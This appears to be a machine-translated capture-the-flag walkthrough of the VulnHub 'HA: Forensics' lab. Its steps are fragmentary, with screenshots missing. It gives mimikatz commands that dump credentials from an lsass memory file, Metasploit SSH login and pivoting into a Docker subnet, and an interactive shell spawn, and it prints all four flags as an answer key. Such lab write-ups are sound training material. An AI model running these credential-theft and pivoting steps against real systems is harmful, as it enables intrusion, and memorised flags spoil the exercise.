HA: FORENSICS in VulnHub Shooting Range
Check ip:
scan port, find open port 80 and 22, access port 80,
scan the directory, find tips.txt:
download the zip, find the password is needed, visit the igolder directory, find the pgp key information, go to online decryption:
Crack the password:
get flag2:
there is still a lsass.DMP file in the compressed package,
put it in minikatz to solve it:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
Get:
Take it to decrypt it:
ssh connection: It is
found that sodu is not working later, ifconfig finds a docker:
switch to use msf for ssh login, and use its automatic routing module:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.198.154
set username jasoos
set password Password@1
exploit
session -u 1
use post/multi/manage/autoroute
set session 2
exploit
Use ping to scan for live hosts
use post/multi/gather/ping_sweep
set session 2
set rhosts 172.17.0.0/24
exploit
Scan port
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set port 1-100
exploit
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
exploit
Enter ftp to view files:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ftp 172.17.0.2
anonymous
ls
cd pub
ls
get saboot.001
Download to the target machine:
open python -m SimpleHTTPServer
, download the file:
use autopsy:
create a case first:
after creating a case, a specific host is required, and the host name is required. After filling in the name, click "Add Host" to continue
creating the host and ask us to add An image file:
Next, set as the default value, and then click "Add":
Analysis:
View file:
Open flag:
Open creds:
Base64 decryption:
Switch another user: There are
four flags in total, one is missing, and the picture is steganographic :
全部:
flag1:Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}
flag2:Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}
flag3:Flag:3 {8442460f48338fe60a9497b8e0e9022f}
flag4:Flag: {9440aee508b6215995219c58c8ba4b45}